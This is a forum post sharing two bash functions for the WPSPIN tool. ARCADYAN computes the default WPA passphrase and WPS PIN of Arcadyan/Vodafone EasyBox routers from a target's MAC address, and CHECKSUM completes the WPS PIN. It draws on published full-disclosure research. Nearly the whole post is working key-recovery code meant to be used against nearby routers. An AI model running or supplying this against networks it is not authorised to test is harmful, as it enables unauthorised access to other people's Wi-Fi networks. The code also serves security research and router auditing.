Originally Posted by
slim76
LOL, cheers dude.
I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.
i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan
I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )
Code:
ARCADYAN(){
# WPSPIN 1.5 - GPL v 3 by kcdtv
# This function uses three amazing works
# 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
# 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
# 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
#
# Thanks to the three of them for their dedication and passion and for deleivering full disclosure and free code
# This function is based on the script easybox_keygen.sh previously mentioned
# # The quotation from the original work start with double dash and are beetwen quotes
# Some variables and line are changed for a better integration and I add the PIN calculation and Coeamn trick for default WPA
# the lines quoted with six dash and "unchanged" are exactly the same than in easybox_keygen like this "######unchanged"
# This function requires $BSSID which is the mac adress ( hex may format XX:XX:XX:XX:XX:XX)
# It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to
# give the full WPS PIN ($PIN)
## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # supression of $take5 and $last4 compared with esaybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID taht is used in WPSPIN
## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged
## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) ######unchanged
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) ######unchanged
K1=$((($c1)%16)) ######unchanged
K2=$((($c2)%16)) ######unchanged
X1=$((K1^${deci[3]})) ######unchanged
X2=$((K1^${deci[2]})) ######unchanged
X3=$((K1^${deci[1]})) ######unchanged
Y1=$((K2^0x${hexi[1]})) ######unchanged
Y2=$((K2^0x${hexi[2]})) ######unchanged
Y3=$((K2^0x${hexi[3]})) ######unchanged
Z1=$((0x${hexi[2]}^${deci[3]})) ######unchanged
Z2=$((0x${hexi[3]}^${deci[2]})) ######unchanged
Z3=$((K1^K2)) ######unchanged
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to genrate later our PIN, the 7 first digit
DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass
CHECKSUM
}
I put you back CHECKSUM in case it helps you
Code:
CHECKSUM(){ # The function checksum was written for bash by antares_145 form crack-wifi.com
PIN=`expr 10 '*' $STRING` # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
ACCUM=0 # to get a result using this function)
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # multiplying the first number by 3, the second by 1, the third by 3 etc....
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # so we follow the pattern for our seven number
DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
} # STRING + CHECKSUM gives the full WPS PIN
feel free to use the code and if yiou have any question about it do not hesitate to ask
cheers 
)
